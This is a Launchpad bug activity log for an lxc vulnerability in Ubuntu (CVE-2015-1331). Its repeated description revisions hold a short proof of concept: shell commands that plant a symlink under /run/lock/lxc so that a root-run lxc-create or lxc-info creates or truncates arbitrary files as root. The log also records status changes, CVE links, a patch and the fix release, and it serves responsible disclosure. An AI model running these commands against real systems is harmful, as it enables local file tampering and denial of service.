2015-07-02 12:46:33 |
Roman Fiedler |
bug |
|
|
added bug |
2015-07-02 15:16:51 |
Tyler Hicks |
bug |
|
|
added subscriber Stéphane Graber |
2015-07-02 15:16:59 |
Tyler Hicks |
bug |
|
|
added subscriber Serge Hallyn |
2015-07-02 15:30:43 |
Tyler Hicks |
lxc (Ubuntu): status |
New |
Incomplete |
|
2015-07-02 15:35:51 |
Tyler Hicks |
lxc (Ubuntu): status |
Incomplete |
Confirmed |
|
2015-07-02 15:46:07 |
Tyler Hicks |
description |
When lxc tools, e.g. lxc-info is run as user root, a symlink attack on /run/lock/lxc can be used to create or truncate arbitrary files as user root. Therefore the malicious user has to be faster than the first lxc invocation so that /run/lock/lxc does not yet exist.
POC:
# su -s /bin/bash nobody
# mkdir -p lxc/var/lib/lxc
# ln -s /etc/suid-debug lxc/var/lib/lxc/somename
As root:
lxc-info --name somename
The guest "somename" has to exist, the method also works for unprivileged containers in /var/lib/lxc. Using the same command to truncate arbitrary files will cause local DoS
# lsb_release -rd
Description: Ubuntu 14.04.2 LTS
Release: 14.04
# apt-cache policy lxc
lxc:
Installed: 1.0.7-0ubuntu0.1
Candidate: 1.0.7-0ubuntu0.1
Version table:
*** 1.0.7-0ubuntu0.1 0
500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
100 /var/lib/dpkg/status
1.0.3-0ubuntu3 0
500 http://archivexxx/ubuntu/ trusty/main amd64 Packages |
When lxc tools, e.g. lxc-info is run as user root, a symlink attack on /run/lock/lxc can be used to create or truncate arbitrary files as user root. Therefore the malicious user has to be faster than the first lxc invocation so that /run/lock/lxc does not yet exist.
Arbitrary file creation PoC:
$ mkdir -p /run/lock/lxc/var/lib/lxc
$ ln -s /test /run/lock/lxc/var/lib/lxc/somename
$ stat /test
stat: cannot stat ‘/test’: No such file or directory
$ sudo lxc-create --name somename --template download # An admin would run this command
...
Distribution: ubuntu
Release: trusty
Architecture: amd64
...
$ stat /test
File: ‘/test’
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd01h/64769d Inode: 52559 Links: 1
Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2015-07-02 10:40:55.703646793 -0500
Modify: 2015-07-02 10:40:55.703646793 -0500
Change: 2015-07-02 10:40:55.703646793 -0500
Birth: -
Arbitrary file truncation PoC:
TODO (Roman)
The method also works for unprivileged containers in /var/lib/lxc. Using the same command to truncate arbitrary files will cause local DoS
# lsb_release -rd
Description: Ubuntu 14.04.2 LTS
Release: 14.04
# apt-cache policy lxc
lxc:
Installed: 1.0.7-0ubuntu0.1
Candidate: 1.0.7-0ubuntu0.1
Version table:
*** 1.0.7-0ubuntu0.1 0
500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
100 /var/lib/dpkg/status
1.0.3-0ubuntu3 0
500 http://archivexxx/ubuntu/ trusty/main amd64 Packages |
|
2015-07-02 15:50:45 |
Marc Deslauriers |
cve linked |
|
2015-1331 |
|
2015-07-02 16:19:29 |
Tyler Hicks |
bug |
|
|
added subscriber Ubuntu Security Team |
2015-07-02 18:51:18 |
Tyler Hicks |
description |
When lxc tools, e.g. lxc-info is run as user root, a symlink attack on /run/lock/lxc can be used to create or truncate arbitrary files as user root. Therefore the malicious user has to be faster than the first lxc invocation so that /run/lock/lxc does not yet exist.
Arbitrary file creation PoC:
$ mkdir -p /run/lock/lxc/var/lib/lxc
$ ln -s /test /run/lock/lxc/var/lib/lxc/somename
$ stat /test
stat: cannot stat ‘/test’: No such file or directory
$ sudo lxc-create --name somename --template download # An admin would run this command
...
Distribution: ubuntu
Release: trusty
Architecture: amd64
...
$ stat /test
File: ‘/test’
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd01h/64769d Inode: 52559 Links: 1
Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2015-07-02 10:40:55.703646793 -0500
Modify: 2015-07-02 10:40:55.703646793 -0500
Change: 2015-07-02 10:40:55.703646793 -0500
Birth: -
Arbitrary file truncation PoC:
TODO (Roman)
The method also works for unprivileged containers in /var/lib/lxc. Using the same command to truncate arbitrary files will cause local DoS
# lsb_release -rd
Description: Ubuntu 14.04.2 LTS
Release: 14.04
# apt-cache policy lxc
lxc:
Installed: 1.0.7-0ubuntu0.1
Candidate: 1.0.7-0ubuntu0.1
Version table:
*** 1.0.7-0ubuntu0.1 0
500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
100 /var/lib/dpkg/status
1.0.3-0ubuntu3 0
500 http://archivexxx/ubuntu/ trusty/main amd64 Packages |
When lxc tools, e.g. lxc-info is run as user root, a symlink attack on /run/lock/lxc can be used to create arbitrary files as the root user. The malicious user has to set up the symlink attack before /run/lock/lxc/ exists, which is only possible prior to the administrator creating the first container.
PoC:
$ mkdir -p /run/lock/lxc/var/lib/lxc
$ ln -s /test /run/lock/lxc/var/lib/lxc/somename
$ stat /test
stat: cannot stat ‘/test’: No such file or directory
$ sudo lxc-create --name somename --template download # An admin would run this command
...
Distribution: ubuntu
Release: trusty
Architecture: amd64
...
$ stat /test
File: ‘/test’
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd01h/64769d Inode: 52559 Links: 1
Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2015-07-02 10:40:55.703646793 -0500
Modify: 2015-07-02 10:40:55.703646793 -0500
Change: 2015-07-02 10:40:55.703646793 -0500
Birth: -
# lsb_release -rd
Description: Ubuntu 14.04.2 LTS
Release: 14.04
# apt-cache policy lxc
lxc:
Installed: 1.0.7-0ubuntu0.1
Candidate: 1.0.7-0ubuntu0.1
Version table:
*** 1.0.7-0ubuntu0.1 0
500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
100 /var/lib/dpkg/status
1.0.3-0ubuntu3 0
500 http://archivexxx/ubuntu/ trusty/main amd64 Packages |
|
2015-07-15 15:58:34 |
Tyler Hicks |
attachment added |
|
0001-lxclock-use-run-lxc-lock-rather-than-run-lock-lxc.patch https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1470842/+attachment/4429477/+files/0001-lxclock-use-run-lxc-lock-rather-than-run-lock-lxc.patch |
|
2015-07-22 10:15:14 |
Roman Fiedler |
description |
When lxc tools, e.g. lxc-info is run as user root, a symlink attack on /run/lock/lxc can be used to create arbitrary files as the root user. The malicious user has to set up the symlink attack before /run/lock/lxc/ exists, which is only possible prior to the administrator creating the first container.
PoC:
$ mkdir -p /run/lock/lxc/var/lib/lxc
$ ln -s /test /run/lock/lxc/var/lib/lxc/somename
$ stat /test
stat: cannot stat ‘/test’: No such file or directory
$ sudo lxc-create --name somename --template download # An admin would run this command
...
Distribution: ubuntu
Release: trusty
Architecture: amd64
...
$ stat /test
File: ‘/test’
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd01h/64769d Inode: 52559 Links: 1
Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2015-07-02 10:40:55.703646793 -0500
Modify: 2015-07-02 10:40:55.703646793 -0500
Change: 2015-07-02 10:40:55.703646793 -0500
Birth: -
# lsb_release -rd
Description: Ubuntu 14.04.2 LTS
Release: 14.04
# apt-cache policy lxc
lxc:
Installed: 1.0.7-0ubuntu0.1
Candidate: 1.0.7-0ubuntu0.1
Version table:
*** 1.0.7-0ubuntu0.1 0
500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
100 /var/lib/dpkg/status
1.0.3-0ubuntu3 0
500 http://archivexxx/ubuntu/ trusty/main amd64 Packages |
During LXC security analysis (see [1]) it was found, that when lxc tools, e.g. lxc-info, are run as user root, a symlink attack on /run/lock/lxc can be used to create arbitrary files as the root user. The malicious user has to set up the symlink attack before /run/lock/lxc/ exists, which is only possible prior to the administrator creating the first container or automatic startup starting after boot starting one.
PoC:
$ mkdir -p /run/lock/lxc/var/lib/lxc
$ ln -s /test /run/lock/lxc/var/lib/lxc/somename
$ stat /test
stat: cannot stat ‘/test’: No such file or directory
$ sudo lxc-create --name somename --template download # An admin would run this command
...
Distribution: ubuntu
Release: trusty
Architecture: amd64
...
$ stat /test
File: ‘/test’
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd01h/64769d Inode: 52559 Links: 1
Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2015-07-02 10:40:55.703646793 -0500
Modify: 2015-07-02 10:40:55.703646793 -0500
Change: 2015-07-02 10:40:55.703646793 -0500
Birth: -
# lsb_release -rd
Description: Ubuntu 14.04.2 LTS
Release: 14.04
# apt-cache policy lxc
lxc:
Installed: 1.0.7-0ubuntu0.1
Candidate: 1.0.7-0ubuntu0.1
Version table:
*** 1.0.7-0ubuntu0.1 0
500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
100 /var/lib/dpkg/status
1.0.3-0ubuntu3 0
500 http://archivexxx/ubuntu/ trusty/main amd64 Packages
[1] https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html |
|
2015-07-22 14:12:24 |
Launchpad Janitor |
lxc (Ubuntu): status |
Confirmed |
Fix Released |
|
2015-07-22 14:12:24 |
Launchpad Janitor |
cve linked |
|
2015-1131 |
|
2015-07-22 14:12:24 |
Launchpad Janitor |
cve linked |
|
2015-1334 |
|
2015-07-22 14:12:25 |
Launchpad Janitor |
lxc (Ubuntu): status |
Confirmed |
Fix Released |
|
2015-07-22 14:12:26 |
Launchpad Janitor |
lxc (Ubuntu): status |
Confirmed |
Fix Released |
|
2015-07-22 14:18:40 |
Tyler Hicks |
information type |
Private Security |
Public Security |
|
2015-07-22 19:22:23 |
Tyler Hicks |
cve unlinked |
2015-1131 |
|
|
2015-07-22 19:23:33 |
Tyler Hicks |
cve linked |
|
2015-1131 |
|
2015-07-22 19:23:54 |
Tyler Hicks |
cve unlinked |
2015-1334 |
|
|
2015-07-22 19:24:10 |
Tyler Hicks |
cve unlinked |
2015-1331 |
|
|
2015-07-22 19:24:44 |
Tyler Hicks |
cve linked |
|
2015-1331 |
|
2015-07-22 19:24:57 |
Tyler Hicks |
cve unlinked |
2015-1131 |
|
|